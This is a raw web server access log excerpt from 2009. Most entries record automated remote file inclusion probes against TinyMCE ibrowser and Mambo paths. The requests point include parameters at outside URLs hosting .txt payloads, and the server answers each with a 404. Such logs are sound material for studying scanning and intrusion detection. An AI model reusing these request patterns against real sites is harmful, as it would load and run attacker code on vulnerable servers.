72.52.136.211 - - [02/Aug/2009:00:28:25 -0400] "GET /logs/access_log.Q109062800//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:25 -0400] "GET /logs//interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
72.52.136.211 - - [02/Aug/2009:00:28:25 -0400] "GET //interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://atelier-reza.com/administrator/components/com_virtuemart/oil2.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
209.59.12.99 - - [02/Aug/2009:00:28:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.145.66 - - [02/Aug/2009:00:28:44 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:00:28:44 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:00:28:44 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:00:28:44 -0400] "GET /logs/access_log.Q109052900//includes/mambo.php/mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
110.45.145.66 - - [02/Aug/2009:00:28:44 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
